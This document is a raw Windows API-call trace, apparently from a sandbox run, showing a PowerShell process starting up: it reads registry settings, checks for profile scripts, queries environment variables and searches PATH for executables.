	[0720.479] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10dcd8 | out: phkResult=0x10dcd8*=0x2f4) returned 0x0
	[0720.479] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10dc5c, lpData=0x0, lpcbData=0x10dc58*=0x0 | out: lpType=0x10dc5c*=0x1, lpData=0x0, lpcbData=0x10dc58*=0x56) returned 0x0
	[0720.479] CoTaskMemAlloc (cb=0x5a) returned 0x1b347ac0
	[0720.479] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10dc2c, lpData=0x1b347ac0, lpcbData=0x10dc28*=0x56 | out: lpType=0x10dc2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10dc28*=0x56) returned 0x0
	[0720.479] CoTaskMemFree (pv=0x1b347ac0) 
	[0720.479] RegCloseKey (hKey=0x2f4) returned 0x0
	[0720.480] CoTaskMemAlloc (cb=0x20c) returned 0x1b31b970
	[0720.480] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b31b970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0720.480] CoTaskMemFree (pv=0x1b31b970) 
	[0720.480] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10d890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0720.480] CoTaskMemAlloc (cb=0x20c) returned 0x1b31b970
	[0720.480] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b31b970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0720.480] CoTaskMemFree (pv=0x1b31b970) 
	[0720.480] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10d890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0720.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0720.482] SetErrorMode (uMode=0x1) returned 0x1
	[0720.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10dc40 | out: lpFileInformation=0x10dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0720.483] SetErrorMode (uMode=0x1) returned 0x1
	[0720.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0720.483] SetErrorMode (uMode=0x1) returned 0x1
	[0720.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10dc40 | out: lpFileInformation=0x10dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0720.483] SetErrorMode (uMode=0x1) returned 0x1
	[0720.483] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0720.483] SetErrorMode (uMode=0x1) returned 0x1
	[0720.483] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10dc40 | out: lpFileInformation=0x10dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0720.484] SetErrorMode (uMode=0x1) returned 0x1
	[0720.484] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0720.484] SetErrorMode (uMode=0x1) returned 0x1
	[0720.484] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10dc40 | out: lpFileInformation=0x10dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0720.485] SetErrorMode (uMode=0x1) returned 0x1
	[0720.487] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0720.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0720.487] CoTaskMemFree (pv=0x2ede50) 
	[0720.488] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0720.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0720.489] CoTaskMemFree (pv=0x2ede50) 
	[0722.083] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0722.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.083] CoTaskMemFree (pv=0x2ede50) 
	[0722.086] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0722.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.087] CoTaskMemFree (pv=0x2ede50) 
	[0722.093] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0722.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.093] CoTaskMemFree (pv=0x2ede50) 
	[0722.094] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2f4
	[0722.094] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390
	[0722.094] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0722.094] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0722.095] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x320
	[0722.095] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x324
	[0722.095] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0722.095] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0722.095] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0722.095] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0722.095] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
	[0722.095] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0722.098] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0722.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.098] CoTaskMemFree (pv=0x2ede50) 
	[0722.100] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0722.101] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x10de20 | out: lpMode=0x10de20) returned 1
	[0722.102] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0722.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.103] CoTaskMemFree (pv=0x2ede50) 
	[0722.106] SetEvent (hEvent=0x314) returned 1
	[0722.106] SetEvent (hEvent=0x2f4) returned 1
	[0722.106] SetEvent (hEvent=0x390) returned 1
	[0722.106] SetEvent (hEvent=0x2fc) returned 1
	[0722.106] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0722.109] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0722.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.109] CoTaskMemFree (pv=0x2ede50) 
	[0722.110] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10db78 | out: phkResult=0x10db78*=0x34c) returned 0x0
	[0722.110] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10dafc, lpData=0x0, lpcbData=0x10daf8*=0x0 | out: lpType=0x10dafc*=0x0, lpData=0x0, lpcbData=0x10daf8*=0x0) returned 0x2

Thread:
	id = 567
	os_tid = 0xcbc


Thread:
	id = 571
	os_tid = 0xccc


Thread:
	id = 951
	os_tid = 0x1974


Thread:
	id = 954
	os_tid = 0x19a0


Thread:
	id = 967
	os_tid = 0x19dc


Thread:
	id = 990
	os_tid = 0x1a60


Thread:
	id = 992
	os_tid = 0x1a70

	[0525.555] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0630.290] LocalFree (hMem=0x257290) returned 0x0
	[0630.291] CloseHandle (hObject=0x314) returned 1
	[0630.291] CloseHandle (hObject=0x13) returned 1
	[0630.292] CloseHandle (hObject=0xf) returned 1
	[0630.292] RegCloseKey (hKey=0x2fc) returned 0x0
	[0630.292] RegCloseKey (hKey=0x2f8) returned 0x0
	[0630.292] RegCloseKey (hKey=0x2f4) returned 0x0
	[0630.293] LocalFree (hMem=0x2572e0) returned 0x0
	[0630.293] RegCloseKey (hKey=0x31c) returned 0x0
	[0662.598] RegCloseKey (hKey=0x31c) returned 0x0
	[0693.245] RegCloseKey (hKey=0x38c) returned 0x0
	[0693.245] RegCloseKey (hKey=0x388) returned 0x0
	[0693.245] RegCloseKey (hKey=0x364) returned 0x0
	[0693.246] RegCloseKey (hKey=0x3a0) returned 0x0
	[0693.246] RegCloseKey (hKey=0x380) returned 0x0
	[0693.246] RegCloseKey (hKey=0x37c) returned 0x0
	[0693.247] RegCloseKey (hKey=0x378) returned 0x0
	[0693.247] RegCloseKey (hKey=0x374) returned 0x0
	[0693.247] RegCloseKey (hKey=0x370) returned 0x0
	[0693.247] RegCloseKey (hKey=0x36c) returned 0x0
	[0693.248] RegCloseKey (hKey=0x368) returned 0x0
	[0693.248] RegCloseKey (hKey=0x340) returned 0x0
	[0693.248] RegCloseKey (hKey=0x39c) returned 0x0
	[0693.248] RegCloseKey (hKey=0x398) returned 0x0
	[0693.249] RegCloseKey (hKey=0x360) returned 0x0
	[0693.249] RegCloseKey (hKey=0x35c) returned 0x0
	[0693.249] RegCloseKey (hKey=0x358) returned 0x0
	[0693.250] RegCloseKey (hKey=0x354) returned 0x0
	[0693.250] RegCloseKey (hKey=0x350) returned 0x0
	[0693.250] RegCloseKey (hKey=0x34c) returned 0x0
	[0693.250] RegCloseKey (hKey=0x348) returned 0x0
	[0693.251] RegCloseKey (hKey=0x344) returned 0x0
	[0693.251] RegCloseKey (hKey=0x394) returned 0x0
	[0693.255] RegCloseKey (hKey=0x334) returned 0x0
	[0693.255] RegCloseKey (hKey=0x330) returned 0x0
	[0693.255] RegCloseKey (hKey=0x32c) returned 0x0
	[0693.256] RegCloseKey (hKey=0x328) returned 0x0
	[0693.256] RegCloseKey (hKey=0x324) returned 0x0
	[0693.256] RegCloseKey (hKey=0x320) returned 0x0
	[0693.256] RegCloseKey (hKey=0x314) returned 0x0
	[0693.257] RegCloseKey (hKey=0x2fc) returned 0x0
	[0693.257] RegCloseKey (hKey=0x390) returned 0x0
	[0693.257] RegCloseKey (hKey=0x2f4) returned 0x0
	[0693.257] RegCloseKey (hKey=0x31c) returned 0x0
	[0782.657] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 1071
	os_tid = 0x6bc


Thread:
	id = 1449
	os_tid = 0xc58

	[0725.206] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0725.212] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0725.216] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0725.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.217] CoTaskMemFree (pv=0x2ede50) 
	[0725.218] VirtualQuery (in: lpAddress=0x1c81d8e0, lpBuffer=0x1c81e7a0, dwLength=0x30 | out: lpBuffer=0x1c81e7a0*(BaseAddress=0x1c81d000, AllocationBase=0x1be90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0725.222] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0725.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.222] CoTaskMemFree (pv=0x2ede50) 
	[0725.225] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0725.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.225] CoTaskMemFree (pv=0x2ede50) 
	[0725.228] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0725.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.228] CoTaskMemFree (pv=0x2ede50) 
	[0725.247] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0725.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.247] CoTaskMemFree (pv=0x2ede50) 
	[0726.800] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0726.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.800] CoTaskMemFree (pv=0x2ede50) 
	[0726.801] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0726.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.801] CoTaskMemFree (pv=0x2ede50) 
	[0726.806] VirtualQuery (in: lpAddress=0x1c81db90, lpBuffer=0x1c81ea50, dwLength=0x30 | out: lpBuffer=0x1c81ea50*(BaseAddress=0x1c81d000, AllocationBase=0x1be90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0726.807] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0726.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.807] CoTaskMemFree (pv=0x2ede50) 
	[0726.810] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0726.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.810] CoTaskMemFree (pv=0x2ede50) 
	[0726.810] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0726.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.810] CoTaskMemFree (pv=0x2ede50) 
	[0726.812] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0726.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.812] CoTaskMemFree (pv=0x2ede50) 
	[0726.816] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0726.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.816] CoTaskMemFree (pv=0x2ede50) 
	[0728.501] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0728.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.502] CoTaskMemFree (pv=0x2ede50) 
	[0728.504] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0728.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.504] CoTaskMemFree (pv=0x2ede50) 
	[0728.505] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0728.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.506] CoTaskMemFree (pv=0x2ede50) 
	[0730.423] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0730.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.423] CoTaskMemFree (pv=0x2ede50) 
	[0730.424] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0730.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.425] CoTaskMemFree (pv=0x2ede50) 
	[0730.427] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0730.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.427] CoTaskMemFree (pv=0x2ede50) 
	[0730.430] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0730.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.430] CoTaskMemFree (pv=0x2ede50) 
	[0730.448] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0730.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.448] CoTaskMemFree (pv=0x2ede50) 
	[0733.704] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0733.704] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0733.704] CoTaskMemFree (pv=0x2ede50) 
	[0733.707] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0733.707] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0733.707] CoTaskMemFree (pv=0x2ede50) 
	[0733.707] CoTaskMemAlloc (cb=0x128) returned 0x301890
	[0733.707] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x301890, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0733.707] CoTaskMemFree (pv=0x301890) 
	[0733.715] CoTaskMemAlloc (cb=0x20e) returned 0x1b31d5e0
	[0733.715] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b31d5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0733.715] CoTaskMemFree (pv=0x1b31d5e0) 
	[0733.719] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0733.721] SetErrorMode (uMode=0x1) returned 0x1
	[0733.724] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0735.254] SetErrorMode (uMode=0x1) returned 0x1
	[0735.256] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0735.256] SetErrorMode (uMode=0x1) returned 0x1
	[0735.256] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0735.265] SetErrorMode (uMode=0x1) returned 0x1
	[0735.266] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0735.266] SetErrorMode (uMode=0x1) returned 0x1
	[0735.266] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0735.275] SetErrorMode (uMode=0x1) returned 0x1
	[0735.276] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0735.276] SetErrorMode (uMode=0x1) returned 0x1
	[0735.276] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0735.284] SetErrorMode (uMode=0x1) returned 0x1
	[0735.286] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0735.286] SetErrorMode (uMode=0x1) returned 0x1
	[0735.286] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0736.561] SetErrorMode (uMode=0x1) returned 0x1
	[0736.562] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0736.563] SetErrorMode (uMode=0x1) returned 0x1
	[0736.563] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0736.571] SetErrorMode (uMode=0x1) returned 0x1
